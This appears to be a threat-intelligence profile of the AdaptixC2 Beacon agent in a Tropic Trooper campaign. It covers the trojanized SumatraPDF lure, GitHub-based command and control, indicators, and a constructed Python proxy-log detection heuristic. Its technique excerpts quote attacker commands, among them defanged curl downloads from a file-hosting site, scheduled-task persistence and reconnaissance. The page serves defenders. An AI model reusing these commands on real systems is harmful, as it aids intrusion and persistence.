AdaptixC2 Beacon
AdaptixC2 Beacon is a post-exploitation agent observed in a campaign attributed with high confidence by Zscaler ThreatLabz to Tropic Trooper (also tracked as APT23, Earth Centaur, KeyBoy, and Pirate Panda). In the reported activity, victims were targeted via a ZIP archive containing military-themed lure documents and a trojanized SumatraPDF executable. When executed, the rogue SumatraPDF displayed a decoy PDF while covertly downloading and executing encrypted shellcode, using a modified TOSHIS loader, a Xiangoop variant previously linked to Tropic Trooper, to deploy the AdaptixC2 Beacon agent.
The malware was used against Chinese-speaking individuals, primarily in Taiwan, as well as targets in South Korea and Japan. Researchers described the campaign as a shift by Tropic Trooper from previously used payloads such as Cobalt Strike Beacon and Merlin Mythic agents to the open-source AdaptixC2 framework.
AdaptixC2 Beacon used a customized GitHub-based command-and-control listener. Reported configuration and behavior included use of api.github.com and the repository cvaS23uchsahs/rss, polling open GitHub issues for tasking, sending an initial encrypted beacon via POST to GitHub Issue #1, and uploading execution results back to repository contents paths under /contents/download/. The implant queried ipinfo.io to determine the victim’s external IP address before GitHub-based communications. Communications used RC4, including a reported configuration key of 7adf76418856966effc9ccf8a21d1b12 and a generated 16-byte RC4 session key. Researchers also observed rapid deletion of GitHub beacon artifacts, often within 10 seconds, which hindered decryption and forensic analysis.
Observed tasking indicated the implant was used mainly for reconnaissance and staging. Commands included network discovery such as arp /a and net view, as well as scheduled task creation for persistence. On selected high-value systems, operators subsequently deployed Microsoft Visual Studio Code and abused VS Code tunnels for interactive remote access. Associated infrastructure included staging server 158.247.193[.]100, which was also observed hosting Cobalt Strike Beacon and the EntryShell backdoor, both previously linked to Tropic Trooper.
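As an added defender-side example (not code from the page or from the researchers), the following Python heuristic flags the C2 chain described above in web proxy logs: an ipinfo.io lookup, repeated polling of one GitHub repository's issues, a POST to an issue, and a PUT under /contents/download/. The log lines, the repository name and the exact API paths are constructed from the description and are assumptions.

```python
"""Flag hosts showing the GitHub-as-C2 chain described above in web proxy logs.
Sample log lines, repository name and API paths below are constructed assumptions."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed proxy log: "timestamp client method url"; repo name is a placeholder.
SAMPLE_LOG = """\
2024-05-01T09:00:01Z 10.0.0.15 GET https://ipinfo.io/json
2024-05-01T09:00:03Z 10.0.0.15 POST https://api.github.com/repos/example-org/rss/issues/1/comments
2024-05-01T09:00:08Z 10.0.0.15 GET https://api.github.com/repos/example-org/rss/issues?state=open
2024-05-01T09:00:18Z 10.0.0.15 GET https://api.github.com/repos/example-org/rss/issues?state=open
2024-05-01T09:00:21Z 10.0.0.15 PUT https://api.github.com/repos/example-org/rss/contents/download/out.b64
2024-05-01T09:05:00Z 10.0.0.22 GET https://api.github.com/repos/example-org/rss/issues?state=open
"""

LINE_RE = re.compile(r"^(\S+) (\S+) ([A-Z]+) (\S+)$")
REPO_RE = re.compile(r"^https://api\.github\.com/repos/([^/]+/[^/]+)/([^?]*)")

def parse(log_text):
    # Yield (timestamp, client, method, url) for every well-formed line.
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, client, method, url = m.groups()
            yield datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), client, method, url

def detect(log_text, window=timedelta(minutes=10), min_polls=2):
    # Return {client: sorted repos} for clients that complete the whole chain.
    by_client = defaultdict(list)
    for ev in parse(log_text):
        by_client[ev[1]].append(ev)
    hits = {}
    for client, events in by_client.items():
        ipinfo = [ts for ts, _, _, url in events if "ipinfo.io" in url]
        gh = [ts for ts, _, _, url in events if REPO_RE.match(url)]
        # The external-IP lookup must precede the first GitHub API contact within the window.
        primed = bool(gh) and any(t <= min(gh) <= t + window for t in ipinfo)
        stats = defaultdict(lambda: {"poll": 0, "post": 0, "put": 0})
        for _, _, method, url in events:
            m = REPO_RE.match(url)
            repo, path = m.groups() if m else (None, "")
            if method == "GET" and path.startswith("issues"):
                stats[repo]["poll"] += 1          # tasking poll of open issues
            elif method == "POST" and re.match(r"issues/\d+", path):
                stats[repo]["post"] += 1          # initial beacon posted to an issue
            elif method == "PUT" and path.startswith("contents/download/"):
                stats[repo]["put"] += 1           # results uploaded as file contents
        for repo, s in stats.items():
            if primed and s["poll"] >= min_polls and s["post"] and s["put"]:
                hits.setdefault(client, []).append(repo)
    return {c: sorted(r) for c, r in hits.items()}
```

Because the beacon artifacts on GitHub are deleted within seconds, the proxy log is often the only durable record of this exchange, which is why the check runs on traffic metadata rather than repository contents.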
Groups observed using it
1 distinct threat actor attributed by public researchers.
This campaign deploys the AdaptixC2 Beacon post-exploitation agent, ultimately facilitating the misuse of Microsoft Visual Studio Code tunnels for remote access.
Techniques & procedures
22 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
1 technique
The attack begins with a ZIP archive containing military-themed lures to launch a rogue SumatraPDF version.
Execution
4 techniques
Commands observed by ThreatLabz included scheduled task creation for persistence... Monitor for unusual scheduled task creation using names that impersonate system services, such as “MSDNSvc” or “MicrosoftUDN.”
ThreatLabz observed the threat actor issuing the following commands: arp /a ... curl -O http://bashupload[.]app/6e1lhc ... schtasks /create ... wmic process where processid=8528 get commandline
This decoy application displays a fake PDF while secretly retrieving and executing encrypted shellcode.
When a victim runs this file, the loader quietly downloads and displays a convincing PDF lure... while simultaneously downloading and executing an AdaptixC2 Beacon agent in the background.
Persistence
1 technique
Privilege Escalation
1 technique
Stealth
3 techniques
This decoy application displays a fake PDF while secretly retrieving and executing encrypted shellcode.
TOSHIS loader then retrieves a second-stage shellcode from the same IP address, decrypts it using AES-128 CBC with WinCrypt cryptographic functions... The agent decodes its Base64-encoded contents... Each task in the queue is decrypted using the RC4 session key
...decrypts it using AES-128 CBC with WinCrypt cryptographic functions, and executes the shellcode directly in-memory.
Defense Impairment
1 technique
The campaign that ThreatLabz researchers observed used a trojanized SumatraPDF binary to deploy an AdaptixC2 Beacon and ultimately VS Code on targeted machines.
Discovery
5 techniques
Commands observed by ThreatLabz included scheduled task creation for persistence, network reconnaissance using arp and net view
The agent begins by retrieving its external IP address from ipinfo.io
tasklist | findstr /i note ... tasklist|findstr /i code.exe ... wmic process where processid=8528 get commandline
curl http://bashupload[.]app/zgel2a.bin -o v.zip & dir
Command and Control
7 techniques
The campaign deploys the AdaptixC2 Beacon post-exploitation agent... utilizes a custom AdaptixC2 Beacon listener with GitHub as its command-and-control platform... The agent communicates via GitHub to receive commands.
the custom AdaptixC2 beacon listener to use GitHub as its command-and-control (C2) platform... the beacon interacts with a GitHub repository, reading task assignments from GitHub Issues and uploading results back to the same repository as file contents.
...custom beacon listener component, which utilizes GitHub as its C2 server... The figure below shows the layout of the GitHub repository used for C2.
A loader, TOSHIS, a variant of Xiangoop malware linked to Tropic Trooper, then deploys both the lure document and the AdaptixC2 Beacon agent.
sends back encrypted responses as Base64-encoded file uploads to the repository
Once a target is deemed valuable, attackers establish VS Code tunnels for remote access, sometimes installing alternative trojanized applications for camouflage.
It then sends an initial beacon via a POST request to GitHub Issue number 1, encrypted using an RC4 session key... All C2 traffic is encrypted using RC4
Exfiltration
1 technique
After processing the task, the agent prepares a response payload... The entire buffer is Base64-encoded, and the agent uploads the buffer as a file to GitHub.
Recent activity
5 sources tracked across advisories, community write-ups, and news.
A post-exploitation beacon/agent used in the campaign for command execution and remote access, communicating with a custom listener over GitHub-based command-and-control.
A post-exploitation agent used to establish command-and-control via GitHub, receive tasks, and support remote access operations on compromised hosts.
A beacon payload deployed via a trojanized SumatraPDF binary in a Tropic Trooper campaign.
An open-source offensive framework beacon used to gain persistent remote access. In this campaign, a custom beacon listener used GitHub as command-and-control by reading tasks from GitHub Issues and uploading encrypted results back to the repository, with RC4-encrypted traffic and rapid deletion of posted data.